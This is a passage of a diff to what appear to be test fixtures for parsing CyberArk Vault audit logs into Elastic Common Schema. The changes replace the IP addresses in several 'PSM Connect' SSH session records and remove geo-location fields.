VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:54:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:54:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:54:56\",\"IsoTimestamp\":\"2021-03-11T17:54:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331156200Z", + "original": "\u003c5\u003e1 2021-03-11T17:54:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:54:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:54:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:54:56\",\"IsoTimestamp\":\"2021-03-11T17:54:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -578,20 +542,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -615,7 +570,7 @@ }, "@timestamp": "2021-03-11T17:56:37.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -627,15 +582,15 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:56:37Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:56:37\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:56:37Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:56:37\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:56:37Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -648,20 +603,20 @@ "psmid": "PSMServer", "session_id": "173dd46a-8293-11eb-afcb-080027efd402", "src_host": "10.0.2.2", - "dst_host": "34.123.103.115" + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "PSM Connect", "timestamp": "Mar 11 09:56:37", "desc": "PSM Connect" @@ -672,8 +627,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936277400Z", - "original": "\u003c5\u003e1 2021-03-11T17:56:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:56:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:56:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:56:37\",\"IsoTimestamp\":\"2021-03-11T17:56:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331162200Z", + "original": "\u003c5\u003e1 2021-03-11T17:56:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:56:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:56:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:56:37\",\"IsoTimestamp\":\"2021-03-11T17:56:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -696,20 +651,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -733,7 +679,7 @@ }, "@timestamp": "2021-03-11T20:23:25.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -745,15 +691,15 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T20:23:25Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:23:25\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:23:25Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:23:25\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:23:25Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -766,20 +712,20 @@ "psmid": "PSMServer", "session_id": "988b22e8-82a7-11eb-83b9-080027efd402", "src_host": "10.0.2.2", - "dst_host": "34.123.103.115" + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "PSM Connect", "timestamp": "Mar 11 12:23:25", "desc": "PSM Connect" @@ -790,8 +736,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936279900Z", - "original": "\u003c5\u003e1 2021-03-11T20:23:25Z VAULT 